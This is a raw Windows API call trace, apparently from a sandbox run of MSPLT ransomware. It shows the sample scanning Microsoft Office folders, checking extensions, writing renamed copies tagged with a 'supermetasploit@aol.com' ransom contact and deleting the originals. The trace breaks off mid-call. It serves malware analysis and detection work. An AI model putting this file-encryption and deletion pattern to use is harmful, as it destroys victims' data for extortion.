[0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString=".dbf") returned 4 [0315.449] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString=".1cd") returned 4 [0315.449] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString=".jpg") returned 4 [0315.449] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString=".doc") returned 4 [0315.449] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString=".docx") returned 5 [0315.450] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.450] lstrlenW (lpString=".pdf") returned 4 [0315.450] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString=".xls") returned 4 [0315.450] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString=".xlsx") returned 5 [0315.450] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.450] lstrlenW (lpString=".ppt") returned 4 [0315.450] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.450] lstrlenW (lpString=".zip") returned 4 [0315.450] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString=".rar") returned 4 [0315.450] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.450] lstrlenW (lpString=".bz2") returned 4 [0315.450] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.450] lstrlenW (lpString=".7z") returned 3 [0315.450] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.450] lstrlenW (lpString=".dbf") returned 4 [0315.450] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.450] lstrlenW (lpString=".1cd") returned 4 [0315.451] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.451] lstrlenW (lpString=".jpg") returned 4 [0315.451] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.451] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.451] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0315.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.452] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=19648) returned 1 [0315.452] CloseHandle (hObject=0x53c) returned 1 [0315.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll")) returned 0x220 [0315.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 77 [0315.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 77 [0315.452] lstrlenW (lpString=".doc") returned 4 [0315.452] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.452] lstrlenW (lpString=".docx") returned 5 [0315.452] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.452] lstrlenW (lpString=".pdf") returned 4 [0315.453] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.453] lstrlenW (lpString=".xls") returned 4 [0315.453] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.453] lstrlenW (lpString=".xlsx") returned 5 [0315.453] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.453] lstrlenW (lpString=".ppt") returned 4 [0315.453] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 77 [0315.453] lstrlenW (lpString=".zip") returned 4 [0315.453] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.453] lstrlenW (lpString=".rar") returned 4 [0315.453] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.453] lstrlenW (lpString=".bz2") returned 4 [0315.453] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.453] lstrlenW (lpString=".7z") returned 3 [0315.453] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 77 [0315.453] lstrlenW (lpString=".dbf") returned 4 [0315.453] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0319.355] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.355] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.356] GetLastError () returned 0x0 [0319.356] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x12ee, lpOverlapped=0x0) returned 1 [0319.363] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x12f0, lpOverlapped=0x0) returned 1 [0319.364] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.364] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xea, lpOverlapped=0x0) returned 1 [0319.364] SetEndOfFile (hFile=0x438) returned 1 [0319.365] CloseHandle (hObject=0x438) returned 1 [0319.365] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.365] SetEndOfFile (hFile=0x348) returned 1 [0319.368] CloseHandle (hObject=0x348) returned 1 [0319.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid")) returned 1 [0319.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.370] lstrlenW (lpString=".doc") returned 4 [0319.370] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.371] lstrlenW (lpString=".docx") returned 5 [0319.371] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.371] lstrlenW (lpString=".pdf") returned 4 [0319.371] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.371] lstrlenW (lpString=".xls") returned 4 [0319.371] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.371] lstrlenW (lpString=".xlsx") returned 5 [0319.371] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.371] lstrlenW (lpString=".ppt") returned 4 [0319.371] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.371] lstrlenW (lpString=".zip") returned 4 [0319.371] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.371] lstrlenW (lpString=".rar") returned 4 [0319.371] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.371] lstrlenW (lpString=".bz2") returned 4 [0319.371] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.371] lstrlenW (lpString=".7z") returned 3 [0319.371] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.371] lstrlenW (lpString=".dbf") returned 4 [0319.372] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.372] lstrlenW (lpString=".1cd") returned 4 [0319.372] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.372] lstrlenW (lpString=".jpg") returned 4 [0319.372] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.372] lstrlenW (lpString=".doc") returned 4 [0319.372] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.372] lstrlenW (lpString=".docx") returned 5 [0319.372] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.372] lstrlenW (lpString=".pdf") returned 4 [0319.372] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.373] lstrlenW (lpString=".xls") returned 4 [0319.373] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.373] lstrlenW (lpString=".xlsx") returned 5 [0319.373] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.373] lstrlenW (lpString=".ppt") returned 4 [0319.373] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.373] lstrlenW (lpString=".zip") returned 4 [0319.373] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.373] lstrlenW (lpString=".rar") returned 4 [0319.373] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.373] lstrlenW (lpString=".bz2") returned 4 [0319.373] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.373] lstrlenW (lpString=".7z") returned 3 [0319.373] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.373] lstrlenW (lpString=".dbf") returned 4 [0319.373] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.373] lstrlenW (lpString=".1cd") returned 4 [0319.373] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 67 [0319.373] lstrlenW (lpString=".jpg") returned 4 [0319.373] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.374] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.374] lstrlenW (lpString="FINCL_01.MID") returned 12 [0319.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.375] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=12981) returned 1 [0319.375] CloseHandle (hObject=0x348) returned 1 [0319.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid")) returned 0x220 [0319.376] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.376] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.376] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.377] GetLastError () returned 0x0 [0319.377] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x32b5, lpOverlapped=0x0) returned 1 [0319.379] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x32c0, lpOverlapped=0x0) returned 1 [0319.381] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.381] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.381] SetEndOfFile (hFile=0x438) returned 1 [0319.382] CloseHandle (hObject=0x438) returned 1 [0319.382] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.382] SetEndOfFile (hFile=0x348) returned 1 [0319.386] CloseHandle (hObject=0x348) returned 1 [0319.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0319.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.388] lstrlenW (lpString=".doc") returned 4 [0319.388] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.388] lstrlenW (lpString=".docx") returned 5 [0319.388] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.388] lstrlenW (lpString=".pdf") returned 4 [0319.388] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.388] lstrlenW (lpString=".xls") returned 4 [0319.388] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.388] lstrlenW (lpString=".xlsx") returned 5 [0319.388] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.388] lstrlenW (lpString=".ppt") returned 4 [0319.389] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString=".zip") returned 4 [0319.389] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.389] lstrlenW (lpString=".rar") returned 4 [0319.389] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.389] lstrlenW (lpString=".bz2") returned 4 [0319.389] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.389] lstrlenW (lpString=".7z") returned 3 [0319.389] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString=".dbf") returned 4 [0319.389] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString=".1cd") returned 4 [0319.389] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString=".jpg") returned 4 [0319.389] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.389] lstrlenW (lpString=".doc") returned 4 [0319.389] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.389] lstrlenW (lpString=".docx") returned 5 [0319.389] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.389] lstrlenW (lpString=".pdf") returned 4 [0319.390] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.390] lstrlenW (lpString=".xls") returned 4 [0319.390] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.390] lstrlenW (lpString=".xlsx") returned 5 [0319.390] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.390] lstrlenW (lpString=".ppt") returned 4 [0319.390] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.390] lstrlenW (lpString=".zip") returned 4 [0319.390] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.390] lstrlenW (lpString=".rar") returned 4 [0319.390] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.390] lstrlenW (lpString=".bz2") returned 4 [0319.390] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.390] lstrlenW (lpString=".7z") returned 3 [0319.390] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.390] lstrlenW (lpString=".dbf") returned 4 [0319.390] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.390] lstrlenW (lpString=".1cd") returned 4 [0319.390] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 68 [0319.390] lstrlenW (lpString=".jpg") returned 4 [0319.390] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.391] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.391] lstrlenW (lpString="FINCL_02.MID") returned 12 [0319.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.393] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=9318) returned 1 [0319.393] CloseHandle (hObject=0x348) returned 1 [0319.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid")) returned 0x220 [0319.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.394] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.394] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.395] GetLastError () returned 0x0 [0319.395] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x2466, lpOverlapped=0x0) returned 1 [0319.887] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x2470, lpOverlapped=0x0) returned 1 [0319.888] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.888] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.889] SetEndOfFile (hFile=0x438) returned 1 [0319.889] CloseHandle (hObject=0x438) returned 1 [0319.889] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.889] SetEndOfFile (hFile=0x348) returned 1 [0319.912] CloseHandle (hObject=0x348) returned 1 [0319.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.913] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid")) returned 1 [0319.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.914] lstrlenW (lpString=".doc") returned 4 [0319.914] lstrcmpiW (lpString1=".doc", 